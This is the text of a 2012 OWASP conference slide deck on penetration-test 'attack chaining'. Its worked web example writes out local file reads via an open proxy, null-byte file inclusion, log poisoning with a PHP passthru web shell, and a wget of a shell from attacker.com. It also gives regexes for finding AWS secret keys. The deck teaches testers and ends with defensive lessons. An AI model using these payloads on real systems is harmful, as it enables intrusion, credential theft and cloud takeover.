Upload
robragan
View
3.354
Download
2
Embed Size (px)
DESCRIPTION
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Citation preview
Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL
31 May 2012
About Us W H O A R E T H E S D U D E S ?
• Rob Sr. Security Associate @ Stach & Liu
2
• Oscar Security Associate @ Stach & Liu
3
Penetration Test vs.
Vulnerability Assessment
4
vs.
5
Simulate a real world attack against a target network or application.
- EVERYBODY
6
It answers the question, “could someone break in?”
Penetration Testing
3
4a 4b 1
2 Information Gathering
Exploit & ���Penetrate
Escalate Privileges
Maintain Access
Deny Access
Pen Testing Scenario
8
• Web application penetration test • Cloud-based infrastructure hosts multiple
sites • Out-sourced PHP development to many
contractors • Determine attackers ability to
compromise PII or infrastructure
Step 1 – Explore
9
Step 2 – Read Code
10
http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ...
Step 3 – Proxy?
11
http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com
Step 4 – Read Local Files!
12
http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd
Attack Chaining – Maneuver 1
13
Attack Chaining – Maneuver 1
14
Step 5 – Gather More Info
15
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf
Step 6 – Keep Going…
16
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
Step 6 – Keep Going…
17
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log
</VirtualHost>
Step 7 – Back to DirBuster
18
Step 8 – Review Code
19
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
Step 8 – Review Code
20
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ?>
Attack Chaining – Maneuver 2
21
Attack Chaining – Maneuver 2
22
Step 9 – Null Byte Injection
23
http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00
Step 8 – Review Code
24
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ?>
Step 10 – Review Gathered Info
25
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
Step 10 – Back to Virtual Conf
26
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log
</VirtualHost>
Step 11 – Where To Stick It?
27
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
Step 12 – Poison Logs
28
Step 12 – Poison Logs
29
Step 12 – Poison Logs
30
<? echo '<pre>'; passthru(\$_GET['cmd']); echo '</pre>'; ?>
Step 13 – PHP in the Log
31
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
Step 13 – PHP in the Log
32
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>';passthru(\$_GET['cmd']);echo '<pre>'; ?>
Step 14 – Execute Code
33
http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
Step 14 – Execute Code
34
<? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
Attack Chaining – Maneuver 3
35
Attack Chaining – Maneuver 3
36
Step 15 – Upload Shell
37
http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
Step 16 – Enjoy!
38
Step 17 – I want more!
39
ec2[^\d]["'][A-Z0-9]{20}["'] ec2.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] ec2.*["'][A-Z0-9]{20}["'] ec2(\D)*["'][A-Z0-9]{20}["'] amazon.*["'][A-Z0-9]{20}["'] (amazon|ec2).*["'][A-Z0-9]{20}["'] amazon(\D)*["'][A-Z0-9]{20}["'] access secret ["'][A-Z0-9]{20}["'] [A-Za-z0-9+/]{40} amazon.*["'][A-Z0-9]{20}["'].*["'][A-Za-z0-9+/]{40}["'] aws.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] amazon.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] secret.*["'][A-Za-z0-9+/]{40}["'] ["'][A-Za-z0-9+/]{40}["'].*amazon
Step 18 – Amazon AWS Regex
40
$this-‐>amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628', $aws_key = '8AFB5AF55D1E6620EE1'; define('AMAZON_KEY', '372B8E408D1484C538F'); if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884'); //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C'); define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
Step 19 – AWS Takeover
41
42
Step 20 – Make It Your Own
1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to
Amazon EC2 3. Attacker launches 100 Extra Large Clusters
Cost of Amazon Cloud Compromise
43
$1,049,000
CRITICAL EXPOSURE
1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to
Amazon EC2 3. Attacker shuts down and deletes all servers and
backups permanently
Take Them Off The Web
44
PRICELESS
CRITICAL EXPOSURE
Attack Chaining – Hack Fu
45
Attack Chaining – Hack Fu
46
Why Is This Happening?
1. Local File Include • File Read Only • Code Execution
2. Null Byte Injection 3. Log Poisoning
47
4. Insecure Credential Storage
5. Overly Permissive Amazon AWS Keys
6. Sensitive Information Disclosure
Web à Mass Malware Deployment
48
Web à Data Center Compromise
49
Web à Internal Network Compromise
50
Internal Assessmentà SSN & Bank #’s
51
Infrastructure Review
52
Step 1 – Target Wireless
53
Step 1 – Target Wireless
54
Step 2 – Port Scan
55
Step 3 – Test Default Creds
56
Infrastructure Apocalypse
57
Step 4 – Control AP
58
Step 5 – Read All E-mail
59
Step 6 – Listen To VOIP
60
Step 7 – Open All Doors
61
Step 7 – Open All Doors
62
63
Step 7 – Server Room Door
64
Is This Real Life?
1. Insecure Wireless Encryption
2. Improper Network Segmentation
3. Insecure Default Configuration
65
4. Weak Passwords 5. Sensitive Information
Disclosure
Protection – How?
1. People 2. Policy 3. Processes 4. Strategic / Tactical
Security 5. Defense In-Depth
66
Defense In-Depth
67
I S P R O T E C T I O N A G A I N S T. . .
How Do You Get Better?
68
Synthesis and Patterns C A N B E B O T H G O O D A N D B A D
69
Attack Visualization L I K E B O B B Y F I S C H E R
70
Thank You
72